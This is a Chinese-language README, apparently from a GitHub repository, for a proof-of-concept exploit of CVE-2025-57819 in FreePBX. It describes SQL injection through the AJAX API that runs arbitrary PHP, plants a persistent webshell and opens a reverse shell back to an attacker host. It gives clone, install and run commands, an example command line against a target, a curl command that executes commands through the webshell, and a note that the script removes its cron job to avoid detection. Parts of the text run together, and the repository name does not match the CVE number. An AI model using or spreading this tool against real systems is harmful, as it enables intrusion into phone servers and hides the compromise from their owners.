
针对 FreePBX 中 CVE-2025-57819 的概念验证漏洞利用:通过 AJAX API 中的 SQL 注入执行任意 PHP 代码、创建持久化 WebShell,并触发反向 Shell。
该脚本利用了 FreePBX 16.0.26.0 之前版本中的一个漏洞(CVE-2025-57819),允许远程攻击者通过 AJAX API 端点中的 SQL 注入缺陷执行任意 PHP 代码。该脚本会同时创建 webshell 和自动触发的反向 shell。
/admin/ajax.php)中的 SQL 注入/pbxshell.php 创建持久化 webshellrequests 库git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST:目标 FreePBX 实例(例如 https://freepbx.example.com)-lhost LHOST:用于反向 shell 回连的 IP 地址-lport LPORT:反向 shell 连接的端口python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
利用成功后,通过以下方式访问 webshell:
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
该脚本会在执行后自动删除 cron 任务以避免被检测。
-- 注释掉剩余的 SQL 语法/var/www/html/ 目录具有写入权限